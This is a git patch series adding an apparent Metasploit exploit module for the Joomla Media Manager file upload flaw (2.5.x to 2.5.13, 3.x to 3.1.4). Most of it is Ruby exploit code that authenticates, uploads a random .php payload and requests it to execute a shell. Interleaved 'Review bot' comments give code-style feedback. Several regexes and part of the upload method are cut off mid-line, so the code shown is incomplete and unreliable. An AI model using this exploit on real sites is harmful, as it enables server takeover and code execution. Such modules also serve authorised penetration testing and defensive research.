From 2086c51b6777f13e560333598393dfd2ebb4373b Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 13 Aug 2013 16:27:27 -0500
Subject: [PATCH 1/5] Add module for Joomla Upload Exploit in the wild

---
 .../unix/webapp/joomla_media_upload_exec.rb | 232 ++++++++++++++++++
 1 file changed, 232 insertions(+)
 create mode 100644 modules/exploits/unix/webapp/joomla_media_upload_exec.rb

diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
new file mode 100644
index 0000000000..4c7613b867
--- /dev/null
+++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
@@ -0,0 +1,232 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "Joomla Media Manager File Upload Vulnerability",
+ 'Description' => %q{
+ This module exploits a vulnerability found in Joomla 2.5.13 and earlier 2.5.x
+ versions, 3.1.4 and earlier 3.x versions. The vulnerability exists in the Media
+ Manager component, allowing arbitrary file uploads, which results in arbitrary code
+ execution. The module has been tested successfully on Joomla 2.5.13 and 3.1.4 on
+ Ubuntu 10.04. In order to work properly, if public access isn't allowed to the
+ Media Manager, credentials with access to the component are needed (Editor role
+ typically).
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Unknown', # Vulnerability Discovery and Exploit in the wild
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ],
+ [ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ]
+ ],
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ # Arbitrary big number. The payload gets sent as POST data, so
+ # really it's unlimited
+ 'Space' => 262144, # 256k
+ },
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ [ 'Joomla 2.5.x <=2.5.13', {} ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Jul 31 2013",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),
+ OptString.new('USERNAME', [false, 'User to login with', '']),
+ OptString.new('PASSWORD', [false, 'Password to login with', '']),
+ ], self.class)
+
+ end
+
+ def peer
+ return "#{rhost}:#{rport}"
+ end
+
+ def check
+ res = get_upload_form
+
+ if res and res.code == 200
+ if res.body =~ /You are not authorised to view this resource./
+ print_status("#{peer} - Joomla Media Manager Found but authentication required")
+ return Exploit::CheckCode::Detected
+ elsif res.body =~ /
'POST',
+ 'uri' => "#{u.path}?#{u.query}",
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'cookie' => @cookies,
+ 'vars_get' => {
+ 'asset' => 'com_content',
+ 'author' => '',
+ 'format' => '',
+ 'view' => 'images',
+ 'folder' => ''
+ },
+ 'data' => post_data
+ })
+
+ return res
+
+ end
+
+ def get_upload_form
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, "index.php"),
+ 'cookie' => @cookies,
+ 'encode_params' => false,
+ 'vars_get' => {
+ 'option' => 'com_media',
+ 'view' => 'images',
+ 'tmpl' => 'component',
+ 'e_name' => 'jform_articletext',
+ 'asset' => 'com_content',
+ 'author' => ''
+ }
+ })
+
+ return res
+ end
+
+ def get_login_form
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, "index.php", "component", "users", "/"),
+ 'cookie' => @cookies,
+ 'vars_get' => {
+ 'view' => 'login'
+ }
+ })
+
+ return res
+
+ end
+
+ def login
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, "index.php", "component", "users", "/"),
+ 'cookie' => @cookies,
+ 'vars_get' => {
+ 'task' => 'user.login'
+ },
+ 'vars_post' => {
+ 'username' => @username,
+ 'password' => @password
+ }.merge(@login_options)
+ })
+
+ return res
+ end
+
+ def parse_login_options(html)
+ html.scan(//) {|option|
+ @login_options[option[0]] = option[1] if option[1] == "1" # Searching for the Token Parameter, which always has value "1"
+ }
+ end
+
+ def exploit
+ @login_options = {}
+ @cookies = ""
+ @upload_name = "#{rand_text_alpha(rand(5) + 3)}.php"
+ @username = datastore['USERNAME']
+ @password = datastore['PASSWORD']
+
+ print_status("#{peer} - Checking Access to Media Component...")
+ res = get_upload_form
+
+ if res and res.code == 200 and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource./
+ print_status("#{peer} - Authentication required... Proceeding...")
+
+ if @username.empty? or @password.empty?
+ fail_with(Exploit::Failure::BadConfig, "#{peer} - Authentication is required to access the Media Manager Component, please provide credentials")
+ end
+ @cookies = res.get_cookies.sub(/;$/, "")
+
+ print_status("#{peer} - Accessing the Login Form...")
+ res = get_login_form
+ if res.nil? or res.code != 200 or res.body !~ /login/
+ fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to Access the Login Form")
+ end
+ parse_login_options(res.body)
+
+ res = login
+ if not res or res.code != 303
+ fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to Authenticate")
+ end
+ elsif res and res.code ==200 and res.headers['Set-Cookie'] and res.body =~ / 'GET',
+ 'uri' => normalize_uri(target_uri.path, "images", @upload_name),
+ })
+
+ end
+
+end

From e4a570d36b5dad9b8b142df15f6ef9c5b3ca3e14 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 13 Aug 2013 16:42:53 -0500
Subject: [PATCH 2/5] Update metadata according to OSVDB

---
 modules/exploits/unix/webapp/joomla_media_upload_exec.rb | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
index 4c7613b867..22c2c47606 100644
--- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
+++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
@@ -27,11 +27,12 @@ class Metasploit3 < Msf::Exploit::Remote
 'License' => MSF_LICENSE,
 'Author' =>
 [
- 'Unknown', # Vulnerability Discovery and Exploit in the wild
+ 'Jens Hinrichsen', # Vulnerability discovery according to the OSVDB
 'juan vazquez' # Metasploit module
 ],
 'References' =>
 [
+ [ 'OSVDB', '95933' ],
 [ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ],
 [ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ]
 ],
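Review bot: The conditions added in this hunk use the keyword operators `and`/`or`/`not` for boolean logic — `if res and res.code == 200`, `if res.nil? or res.code != 200 or res.body !~ /login/`, `if not res or res.code != 303`, `if @username.empty? or @password.empty?` — which bind more loosely than `&&`/`||`/`!` and become a precedence trap as soon as an assignment or a parenthesis-free method call appears in the expression. Rewriting them with the symbolic operators keeps the same meaning and removes the trap, e.g. `if res && res.code == 200` and `unless res && res.code == 303`. In the same spirit, `peer` can drop its explicit `return`, since `"#{rhost}:#{rport}"` is already the method's last expression, and `res.code ==200` should be spaced like the other comparisons. Parts of this hunk are not visible in this view (the response-matching regexes and the start of the upload method), so only the visible conditions are listed here.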
@@ -49,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
 [ 'Joomla 2.5.x <=2.5.13', {} ]
 ],
 'Privileged' => false,
- 'DisclosureDate' => "Jul 31 2013",
+ 'DisclosureDate' => "Aug 01 2013",
 'DefaultTarget' => 0))

 register_options(

From 04eed493102d2954c518016f62b935a84d582631 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 13 Aug 2013 16:47:24 -0500
Subject: [PATCH 3/5] Add support for FileDropper

---
 modules/exploits/unix/webapp/joomla_media_upload_exec.rb | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
index 22c2c47606..72ed8ccd27 100644
--- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
+++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper

 def initialize(info={})
 super(update_info(info,
@@ -222,6 +223,7 @@ class Metasploit3 < Msf::Exploit::Remote
 fail_with(Exploit::Failure::Unknown, "#{peer} - Upload failed")
 end

+ register_files_for_cleanup("#{@upload_name}.")
 print_status("#{peer} - Executing shell...")
 send_request_cgi({
 'method' => 'GET',

From 312ff1a20ecf751d63a729ad99be189921e21610 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 13 Aug 2013 17:50:26 -0500
Subject: [PATCH 4/5] Delete period from regular expressions

---
 modules/exploits/unix/webapp/joomla_media_upload_exec.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
index 72ed8ccd27..e46d1b60b3 100644
--- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
+++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
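Review bot: In the `@@ -222,6 +223,7 @@` hunk the name handed to `register_files_for_cleanup("#{@upload_name}.")` carries a trailing period, while the request on the context lines right below it builds its path from `@upload_name` without one, so the two literals disagree about what the file is called; unless the server is known to keep the trailing period in the stored name, one of the two is likely wrong and the cleanup would not match. If the period is deliberate, a one-line comment on the new line explaining why the stored name differs from the requested one would spare the next reader the same question, e.g. `# the stored file name keeps the trailing period, so the cleanup path must too`. The enclosing `exploit` method starts outside this hunk, and the `@upload_name` assignment it refers to is in the first patch of this series.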
@@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote
 res = get_upload_form

 if res and res.code == 200
- if res.body =~ /You are not authorised to view this resource./
+ if res.body =~ /You are not authorised to view this resource/
 print_status("#{peer} - Joomla Media Manager Found but authentication required")
 return Exploit::CheckCode::Detected
 elsif res.body =~ /
Date: Tue, 13 Aug 2013 19:04:25 -0500
Subject: [PATCH 5/5] Description change

---
 .../unix/webapp/joomla_media_upload_exec.rb | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
index e46d1b60b3..5db200932b 100644
--- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
+++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb
@@ -17,13 +17,13 @@ class Metasploit3 < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => "Joomla Media Manager File Upload Vulnerability",
 'Description' => %q{
- This module exploits a vulnerability found in Joomla 2.5.13 and earlier 2.5.x
- versions, 3.1.4 and earlier 3.x versions. The vulnerability exists in the Media
- Manager component, allowing arbitrary file uploads, which results in arbitrary code
- execution. The module has been tested successfully on Joomla 2.5.13 and 3.1.4 on
- Ubuntu 10.04. In order to work properly, if public access isn't allowed to the
- Media Manager, credentials with access to the component are needed (Editor role
- typically).
+ This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as
+ 3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component,
+ which comes by default in Joomla, allowing arbitrary file uploads, and results in
+ arbitrary code execution. The module has been tested successfully on Joomla 2.5.13
+ and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media
+ Manager, you will need to supply a valid username and password (Editor role or
+ higher) in order to work properly.
 },
 'License' => MSF_LICENSE,
 'Author' =>